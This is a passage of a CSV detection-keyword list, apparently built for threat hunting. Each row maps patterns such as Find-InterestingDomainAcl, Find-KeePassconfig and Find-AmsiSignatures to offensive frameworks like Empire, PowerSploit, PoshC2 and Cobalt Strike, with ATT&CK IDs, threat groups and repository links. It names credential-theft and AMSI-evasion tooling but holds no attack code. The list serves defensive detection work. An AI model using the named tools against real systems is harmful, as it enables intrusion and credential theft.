T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-4648Logons*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*FindAdminAccessComputers*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD 
Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*Find-AdminLogonScripts.ps1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" +"*find-allvulns*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Find-AmsiAstSignatures -*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"*Find-AmsiPSTokenSignatures -*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"*Find-AmsiSignatures.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - 
T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"*Find-AppLockerLogs*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-AVSignature*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all 
phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*findDelegation.py -dc-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*findDelegation.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*Find-DomainShare -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-DomainShare -CheckShareAccess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-Fruit.*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Find-Fruit.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-Fruit.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1108","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*findgpocomputeradmin*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*Find-GPOComputerAdmin*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*Find-GPOComputerAdmin*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Find-InterestingDomainAcl*","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement Enumeration With PowerView","T1595 - T1590 - T1591 - T1213 - T1039 - T1592","N/A","N/A","N/A","Lateral movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Find-InterestingDomainAcl*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" +"*Find-InterestingDomainAcl*","offensive_tool_keyword","empire","Empire 
scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*findinterestingdomainsharefile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - 
T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" +"*Find-InterestingDomainShareFile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" +"*Find-InterestingDomainShareFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*find-interestingfile -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - 
T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Find-InterestingFile*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Find-KeePassconfig*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-KeePassconfig*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" +"*Find-LocalAdminAccess -Verbose*","greyware_tool_keyword","powershell","Find machine where the user has admin privs","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive 
